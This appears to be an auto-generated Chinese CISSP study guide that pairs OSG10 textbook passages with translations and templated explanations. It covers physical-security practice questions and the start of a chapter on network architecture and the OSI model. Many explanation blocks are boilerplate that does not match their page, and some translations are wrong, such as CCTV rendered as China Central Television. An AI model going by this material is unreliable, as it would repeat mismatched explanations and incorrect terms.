身份:身份是主体在系统中的标识。

多因素认证:MFA 使用至少两类不同认证因素,提高认证可信度。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 713 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Policy 高层、强制、稳定;Procedure 具体步骤。

哈希本身不提供机密性;它主要用于完整性校验。

身份管理题要区分识别、认证、授权、审计。

知道的、拥有的、固有的、所处位置、行为特征是常见因素。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
政策 政策是高层原则,说明必须遵守什么。
哈希 哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。
身份 身份是主体在系统中的标识。
多因素认证 MFA 使用至少两类不同认证因素,提高认证可信度。
学习单元 59 / PDF P714

第 714 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

9. What is the best type of water-based fire suppression system for a computer facility? A. Wet pipe system B. Dry pipe system C. Preaction system D. Deluge system 10. Your company has a yearly fire detection and suppression system inspection performed by the local authorities. You start up a conversation with the lead inspector and they ask you, “What is the most common cause of a false positive for a water-based fire suppression system?” What do you answer? A. Water shortage B. People C. Ionization detectors D. Placement of detectors in drop ceilings 11. A data center has had repeated hardware failures.

An auditor notices that systems are stacked together in dense groupings with no clear organization. What should be implemented to address this issue? A. Visitor logs B. Industrial camouflage C. Gas-based fire suppression D. Hot aisles and cold aisles 12. Which of the following are a benefit of a gas-based fire suppression system? (Choose all that apply.) A. Can be deployed throughout a company facility B. Will cause the least damage to computer systems C. Extinguishes the fire by removing oxygen D. May be able to extinguish the fire faster than a water discharge system 13.

When designing physical security for an environment, it is important to focus on the functional order in which controls should be used. Which of 9.

中文直译 / 整理

对于计算机设施,最合适的水基灭火系统是什么? A. 湿式系统 B. 干式系统 C. 预作用系统 D. 雨淋系统 10. 贵公司每年由当地主管部门对火灾探测和灭火系统进行检查。 你与首席检 查员开始交谈,他们问你:“什么是最重要的 水基灭火系统误报的常见原因是什么? ”您如何回答? A. 水资源短缺 B. 人员 C. 电离探测器 D. 探测器在吊顶中的布置 11. 一个数据中心发生了多次硬件故障。 审计员发现系统密集堆叠在一起,缺 乏清晰的组织结构。 应实施什么措施来解决此问题? A. 访客登记 B. 工业伪装 C. 气体灭火 D. 热通道和冷通道 12. 以下哪些是气体灭火系统的优点? (可多选。 ) A. 可部署在整个公司设施中 B. 对计算机系统造成的损害最小 C. 通过移除氧气来灭火 D. 可能比水喷淋系统更快地扑灭火灾 13. 在为环境设计物理安全时,重要的是关注控制措施应使用的功能顺序。 以下哪项

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

审计:审计记录主体行为,用于追责、复盘和取证。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

审计:审计检查控制是否存在、是否有效、是否符合要求。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 714 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

没有日志和身份绑定,就很难问责。

网络题先定位层次,再判断协议、设备或攻击位置。

审计题关注独立性、证据、范围和报告。

日志要保护完整性、时间同步和访问控制。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
审计 审计记录主体行为,用于追责、复盘和取证。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
审计 审计检查控制是否存在、是否有效、是否符合要求。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 60 / PDF P715

可用性:需要时能用,且性能可接受

可用性关注中断、故障、DoS、备份和冗余。

教材原文段落

the following is the correct order of the six common physical security control mechanisms? A. Decide, Delay, Deny, Detect, Deter, Determine B. Deter, Deny, Detect, Delay, Determine, Decide C. Deny, Deter, Delay, Detect, Decide, Determine D. Decide, Detect, Deny, Determine, Deter, Delay 14. Equipment failure is a common cause of a loss of availability. When deciding on strategies to maintain availability, it is often important to understand the criticality of each asset and business process as well as the organization's capacity to weather adverse conditions. Match the term to the definition. I. MTTF II. MTTR III. MTBF IV. SLA 1.

Clearly defines the response time a vendor will provide in the event of an equipment failure emergency 2. An estimation of the time between the first and any subsequent failures 3. The expected typical functional lifetime of the device given a specific operating environment 4. The average length of time required to perform a repair on the device 5. Select the option below that includes only correct matchings between the terms (using Roman numerals) and the definitions (using Arabic numerals). A. I - 1, II - 2, III - 4, IV - 3 B. I - 4, II - 3, III - 1, IV - 2 C. I - 3, II - 4, III - 2, IV - 1 D. I - 2, II - 1, III - 3, IV - 4

中文直译 / 整理

以下六种常见的物理安全控制机制的正确顺序是? A. 决定,延迟,拒绝,检测,威慑,确定 B. 威慑,拒绝,检测,延迟,确定,决定 C. 拒绝,威慑,延迟,检测,决定,确定 D. 决定,检测,拒绝,确定,威慑,延迟 14. 设备故障是导致可用性丧失的常见原因。 在决定维持可用性的策略时, 通常重要的是了解每个资产和业务流程的关键性,以及组织应对不利情况 的能力。 将术语与定义匹配。 I. MTTF II. MTTR III. MTBF IV. SLA 1. 明确定义了供应商在设备故障紧急情况下提供的响应时间 2. 对首次故障与任何后续故障之间时间的估算 3. 在特定运行环境下,设备预期的典型功能寿命 4. 对设备进行维修所需的平均时间 5. 选择以下选项,其中仅包含术语(使用罗马数字)与定义(使用 阿拉伯数字)之间的正确匹配 A. I ‑ 1,II ‑ 2,III ‑ 4,IV ‑ 3 B. I ‑ 4,II ‑ 3,III ‑ 1,IV ‑ 2 C. I ‑ 3,II ‑ 4,III ‑ 2,IV ‑ 1 D. I ‑ 2,II ‑ 1,III ‑ 3,IV ‑ 4

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:可用性关注中断、故障、DoS、备份和冗余。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

可用性:可用性保证授权用户需要时能及时使用系统和数据。

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“可用性:需要时能用,且性能可接受”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
可用性 可用性保证授权用户需要时能及时使用系统和数据。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
学习单元 61 / PDF P716

完整性:数据要正确、可信、未被乱改

完整性不只是防黑客篡改,也包括防授权用户误操作。

教材原文段落

15. You have been placed on the facility security planning team. You've been tasked to create a priority list of issues to address during the initial design phase. What is the most important goal of all security solutions? A. Prevention of disclosure B. Maintaining integrity C. Human safety D. Sustaining availability 16. While reviewing the facility design blueprints, you notice several indications of a physical security mechanism being deployed directly into the building's construction. Which of the following is a double set of doors that is often protected by a guard and is used to contain a subject until their identity and authentication are verified? A. Gate B. Turnstile C.

Person trap D. Proximity detector 17. Due to a recent building intrusion, facility security has become a top priority. You are on the proposal committee that will be making recommendations on how to improve the organization's physical security stance. What is the most common form of perimeter security devices or mechanisms? A. Security guards B. Fences C. CCTV D. Lighting 18. Your organization has just landed a new contract for a major customer. This will involve increasing production operations at the primary facility, which will entail housing valuable digital and physical assets. You need to ensure that these new assets receive proper protections.

Which of the following is not a disadvantage of using security guards? A. Security guards are usually unaware of the scope of the operations within a facility. 15.

中文直译 / 整理

您已被分配到设施安全规划团队。 您的任务是在初始设计阶段创建需解决 的问题优先级列表。 所有安全解决方案最重要的目标是什么? A. 防止信息泄露 B. 维护完整性 C. 人员安全 D. 持续可用性 16. 在审查设施设计蓝图时,您注意到建筑结构中直接部署了若干物理安全机 制。 以下哪一项是通常由保安守护的双门系统,用于在验证主体身份和认证前 将其隔离? A. 门 B. 旋转门 C. 人员陷阱 D. 接近探测器 17. 由于最近发生建筑物入侵事件,设施安全已成为当务之急。 您是提出建议 以改善组织物理安全措施的提案委员会成员。 最常见的周界安全设备或机制是 什么? A. 安保人员 B. 围栏 C. 中央电视 台 D. 照明 18. 您的组织刚刚获得了一项重要客户的全新合同。 这将涉及在主要设施中增 加生产运营,从而需要安置宝贵的数据和实物资产。 您需要确保这些新资产得 到适当的保护。 以下哪一项不是使用安保人员的缺点? 不 A. 安保人员通常不了解设施内运营的范围。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:完整性不只是防黑客篡改,也包括防授权用户误操作。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

可用性:可用性保证授权用户需要时能及时使用系统和数据。

认证:认证是验证“你是不是你声称的那个人”。

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“完整性:数据要正确、可信、未被乱改”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

哈希、数字签名、变更控制、输入校验常对应完整性。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

密码、令牌、生物特征、多因素认证都服务认证。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

身份管理题要区分识别、认证、授权、审计。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
可用性 可用性保证授权用户需要时能及时使用系统和数据。
认证 认证是验证“你是不是你声称的那个人”。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
身份 身份是主体在系统中的标识。
学习单元 62 / PDF P717

第 717 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

B. Not all environments and facilities support security guards. C. Not all security guards are themselves reliable. D. Prescreening, bonding, and training do not guarantee effective and reliable security guards. 19. While designing the security plan for a proposed facility, you are informed that the budget was just reduced by 30 percent. However, they did not adjust or reduce the security requirements. What is the most common and inexpensive form of physical access control device for both interior and exterior use? A. Lighting B. Security guard C. Key locks D. Fences 20.

While implementing a motion detection system to monitor unauthorized access into a secured area of the building, you realize that the current infrared detectors are causing numerous false positives. You need to replace them with another option. What type of motion detector senses changes in the electrical or magnetic field surrounding a monitored object? A. Wave B. Photoelectric C. Heat D. Capacitance B.

中文直译 / 整理

并非所有环境和设施都支持保安人员。 C. 并非所有保安人员都可靠。 D. 预筛选、担保和培训并不能保证保安人员有效且可靠。 19. 在为拟建设施设计安全计划时,您被告知预算刚刚减少了30%。 然而,安 全要求并未调整或降低。 适用于室内外的最常见且最经济的物理访问控制设 备是什么? A. 照明 B. 保安人员 C. 密码锁 D. 围栏 20. 在实施运动检测系统以监控建筑物安全区域的未授权进入时,您发现当前 的红外探测器产生了大量误报。 您需要将其替换为其他选项。 哪种类型的运动 探测器能够感知被监控物体周围电场或磁场的变化? A. 微波 B. 光电 C. 热感 D. 电容

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 717 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

网络题先定位层次,再判断协议、设备或攻击位置。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
第 11 章 · P719-837 · 119 个学习单元

安全网络架构与组件

OSG10 · Chapter 11 · Secure Network Architecture and Components · 全文覆盖 + 小白精读 + 画报

第 11 章:安全网络架构与组件

这不是提炼版。本页按 PDF 第 719-837 页连续覆盖第 11 章内容,每个学习单元都包含教材原文段落、PDF 中文直译/整理、小白解释、考点提醒和对应画报。

119个连续学习单元
4格原文 / 直译 / 解释 / 考点
119页覆盖第11章正文与章末练习
小白先讲人话,再做题
学习单元 01 / PDF P719

本章考试范围总览

先知道本章会覆盖哪些考试目标,后面每个概念才知道放在哪个知识域。

教材原文段落

THE CISSP TOPICS COVERED IN THIS CHAPTER INCLUDE: Domain 4.0: Communication and Network Security 4.1 Apply secure design principles in network architectures 4.1.1 Open System Interconnection (OSI) and Transmission Control Protocol/Internet Protocol (TCP/IP) models 4.1.2 Internet Protocol (IP) version 4 and 6 (IPv6) (e.g., unicast, broadcast, multicast, anycast) 4.1.3 Secure protocols (e.g., Internet Protocol Security (IPSec), Secure Shell (SSH), Secure Sockets Layer (SSL)/Transport Layer Security (TLS)) 4.1.4 Implications of multilayer protocols 4.1.5 Converged protocols (e.g., Internet Small Computer Systems Interface (iSCSI), Voice over Internet Protocol (VoIP), InfiniBand over Ethernet, Compute Express Link) 4.1.6 Transport architecture (e.g., topology, data/control/management plane, cut-through/store-andforward) 4.1.8 Traffic flows (e.g., north-south, east-west) 4.1.9 Physical segmentation (e.g., in-band, out-of-band, airgapped) 4.1.10 Logical segmentation (e.g., virtual local area networks (VLANs), virtual private networks (VPNs), virtual routing and forwarding, virtual domain) 4.1.11 Micro-segmentation (e.g., network overlays/encapsulation; distributed firewalls, routers, intrusion detection system (IDS)/intrusion prevention system (IPS), zero trust) 4.1.12 Edge networks (e.g., ingress/egress, peering) 4.1.13 Wireless networks (e.g., Bluetooth, Wi-Fi, Zigbee, satellite) 4.1.14 Cellular/mobile networks (e.g., 4G, 5G)

中文直译 / 整理

本章涵盖的CISSP主题包括: 领域4.0:通信与网络安全 4.1 在网络架构中应用安全设计原则 4.1.1 开放系统互连(OSI)和传输控制协议/互联网协议(TCP/IP)模 型 4.1.2 互联网协议(IP)版本4和6(IPv6)(例如,单播、广播、 组播、任播) 4.1.3 安全协议(例如,互联网协议安全(IPSec)、安全外壳 (SSH)、安全套接层(SSL)/传输层安全(TLS)) 4.1.4 多层协议的影响 4.1.5 融合协议(例如,互联网小型计算机系统接口(iSCSI)、互联 网协议语音(VoIP)、以太网上的InfiniBand、计算表达链接) 4.1.6 传输架构(例如,拓扑、数据/控制/管理平面、直通/ 存储转发) 4.1.8 流量流向(例如,南北向、东西向) 4.1.9 物理隔离(例如,带内、带外、气隙隔离) 4.1.10 逻辑隔离(例如,虚拟局域网(VLAN)、虚拟专用网 络(VPN)、虚拟路由与转发、虚拟域) 4.1.11 微分段(例如,网络 覆盖/封装;

分布式防火墙、路由器、入侵检测系统(IDS)/入 侵防御系统(IPS)、零信任) 4.1.12 边缘网络(例如,入口/出口、对等连接) 4.1.13 无线网络(例如,蓝牙、Wi‑Fi、Zigbee、卫星) 4.1.14 移动蜂窝网络(例如,4G、5G)

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:先知道本章会覆盖哪些考试目标,后面每个概念才知道放在哪个知识域。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

TCP/IP 模型:TCP/IP 是现实网络常用协议栈,和 OSI 可对应理解。

防火墙:防火墙根据规则控制网络流量进出。

入侵检测系统 IDS:IDS 负责发现可疑行为并告警,一般不直接阻断。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“本章考试范围总览”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

网络题先定位层次,再判断协议、设备或攻击位置。

考试常让你把协议、端口、层次对应起来。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

检测是 IDS,主动阻断更像 IPS。

IPS 放在线路中,误报可能影响可用性。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
TCP/IP 模型 TCP/IP 是现实网络常用协议栈,和 OSI 可对应理解。
防火墙 防火墙根据规则控制网络流量进出。
入侵检测系统 IDS IDS 负责发现可疑行为并告警,一般不直接阻断。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
虚拟专用网络 VPN VPN 在不可信网络上建立加密隧道。
零信任 零信任默认不信任任何访问请求,需要持续验证和最小权限。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 02 / PDF P720

第 720 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

4.1.15 Content distribution networks (CDN) 4.1.16 Software defined networks (SDN) (e.g., application programming interface (API), Software-Defined Wide-Area Network, network functions virtualization) 4.1.17 Virtual Private Cloud (VPC) 4.2 Secure network components 4.2.1 Operation of infrastructure (e.g., redundant power, warranty, support) 4.2.2 Transmission media (e.g., physical security of media, signal propagation quality) 4.2.3 Network Access Control (NAC) systems (e.g., physical, and virtual solutions) 4.2.4 Endpoint security (e.g., host-based) Domain 7.0 Security Operations 7.7 Operate and maintain detection and preventative measures 7.7.1 Firewalls (e.g., next generation, web application, network) This chapter discusses the Open Systems Interconnection (OSI) model as a guiding principle in networking, cabling, wireless connectivity, Transmission Control Protocol/Internet Protocol (TCP/IP) and related protocols, networking devices, and firewalls.

To properly implement secure design principles in network architectures, you must fully understand computer communications technologies. The Communication and Network Security domain deals with topics related to network components (i.e., network devices and protocols)—specifically, how they function and how they are relevant to security. This domain is discussed in this chapter and in Chapter 12, “Secure Communications and Network Attacks.” Be sure to read and study the materials in both chapters to ensure complete coverage of the essential material. OSI Model 4.1.15

中文直译 / 整理

内容分发网络(CDN) 4.1.16 软件定义网络(SDN)(例如,应用程序编程接口 (API)、软件定义广域网、网络功能虚拟化) 4.1.17 虚拟私有云(VPC) 4.2 安全网络组件 4.2.1 基础设施运行(例如,冗余电源、保修、支持) 4.2.2 传输介质(例如,介质的物理安全、信号传播质量) 4.2.3 网络访问控制(NAC)系统(例如,物理和虚拟解决方案) 4.2.4 终端安全(例如,基于主机的) 域 7.0 安全运营 7.7 运营和维护检测与预防措施 7.7.1 防火墙(例如,下一代、Web 应用程序、 网络) 本章讨论开放系统互连(OSI)模型作为网络、布线、无线连接、传输控制协 议/互联网协议(TCP/IP)及相关协议、网络设备和防火墙的指导原则。 要正 确实施网络架构中的安全设计原则,您必须全面理解计算机通信技术。 通信与网络安全领域涉及与网络组件(即网络设备和协议)相关的话题——具 体而言,是它们的功能及其与安全的相关性。 本章和第12章“安全通信与网络 攻击”中将讨论本领域。 请务必阅读并学习这两章的内容,以确保全面掌握核 心材料。 OSI 模型

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

程序:程序是一步一步怎么做。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

TCP/IP 模型:TCP/IP 是现实网络常用协议栈,和 OSI 可对应理解。

防火墙:防火墙根据规则控制网络流量进出。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 720 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

网络题先定位层次,再判断协议、设备或攻击位置。

考试常让你把协议、端口、层次对应起来。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
程序 程序是一步一步怎么做。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
TCP/IP 模型 TCP/IP 是现实网络常用协议栈,和 OSI 可对应理解。
防火墙 防火墙根据规则控制网络流量进出。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 03 / PDF P721

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

Communications between computers over networks are made possible by protocols. A protocol is a set of rules and restrictions that define how data is transmitted over a network medium (e.g., twisted-pair cable, fiber optics, and wireless transmission). The International Organization for Standardization (ISO) developed the Open Systems Interconnection (OSI) Reference Model for protocols in the late 1970s. History of the OSI Model The OSI Reference Model (more commonly called the OSI model) wasn't the first or only attempt to establish a common communications standard.

In fact, the most widely used protocol today, TCP/IP (which is based on the Defense Advanced Research Projects Agency [DARPA] model, also known now as the TCP/IP model) was developed in the early 1970s. The OSI model was not developed until the late 1970s (and not formally published as standard ISO 7498 until 1984). The OSI model was developed to establish a common communication structure or standard for all computer systems. The OSI model serves as a conceptual framework, or theoretical model, for how protocols should function in an ideal world on ideal hardware. The OSI model was developed by ISO to facilitate interoperability between different vendors' systems.

The OSI model has become a common reference point. OSI Functionality The OSI model divides networking tasks into seven layers. Each layer is responsible for performing specific tasks or operations with the ultimate goal of supporting data exchange (i.e., network communication) between two computers. They are referred to by either their name or their layer number (Figure 11.1). The layers are ordered specifically to indicate how information flows through the various levels of communication. Each layer communicates directly with the layer above it as well as the layer below it.

中文直译 / 整理

计算机通过网络进行通信依赖于协议。 协议是一组规则和限制,定义了数据如 何通过网络介质(例如双绞线、光纤和无线传输)进行传输。 国际标准化组织 (ISO)于20世纪70年代末为协议开发了开放系统互连(OSI)参考模型。 OSI模型的历史 OSI参考模型(更常被称为OSI模型)并不是第一个或唯一试图建立通用通信 标准的尝试。 事实上,当今最广泛使用的协议TCP/IP(基于国防高级研究计 划局[DARPA] 模型,现在也称为TCP/IP模型)早在20世纪70年代初就已开发 出来。 OSI模型直到20世纪70年代末才被开发出来(并于1984年才正式作为标 准ISO 7498发布)。 OSI模型旨在为所有计算机系统建立一个通用的通信结构或标准。 OSI模型作 为一个概念框架或理论模型,描述了协议在理想硬件和理想环境中的运作方 式。 OSI模型由ISO开发,旨在促进不同厂商系统之间的互操作性。 OSI模型 已成为一个通用的参考点。 OSI功能 OSI模型将网络任务划分为七层。 每层负责执行特定的任务或操作,最终目标是 支持两台计算机之间的数据交换(即网络通信)。 这些层可通过其名称或层数 字来引用(图11.1)。

这些层按特定顺序排列,以指示信息如何通过各个通信层 级流动。 每层直接与上层和下层进行通信。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

标准:标准给出必须满足的最低要求。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

TCP/IP 模型:TCP/IP 是现实网络常用协议栈,和 OSI 可对应理解。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

ISO 偏标准和管理体系。

Minimum level、mandatory requirement 常对应 standard。

网络题先定位层次,再判断协议、设备或攻击位置。

考试常让你把协议、端口、层次对应起来。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
标准 标准给出必须满足的最低要求。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
TCP/IP 模型 TCP/IP 是现实网络常用协议栈,和 OSI 可对应理解。
学习单元 04 / PDF P722

第 722 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

FIGURE 11.1 The OSI model Encapsulation/Deencapsulation The OSI model represents a protocol stack, which is a layered collection of multiple protocols (i.e., a multilayered protocol). Communication between protocol layers occurs through encapsulation and deencapsulation. Encapsulation is the addition of a header, and possibly a footer, to the data received by each layer from the layer above before it's handed off to the layer below. As the message is encapsulated at each layer, the previous layer's header and payload become the payload of the current layer. The inverse action occurring as data moves up through the OSI model layers from Physical to Application is known as deencapsulation.

The encapsulation/deencapsulation process is as follows:

中文直译 / 整理

图 11.1 OSI 模型 封装/解封装 OSI模型代表一个协议栈,即多个协议的分层集合(即多层协议)。 协议层之 间的通信通过封装和解封装实现。 封装是指在每一层从上层接收到数据后,在 将其传递给下层之前,添加一个头部(可能还包括一个尾部)。 当消息在每一 层进行封装时,前一层的头部和负载将成为当前层的负载。 当数据从物理层到 应用层向上通过OSI模型各层时,发生的相反操作称为解封装。 封装/解封装过 程如下:

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

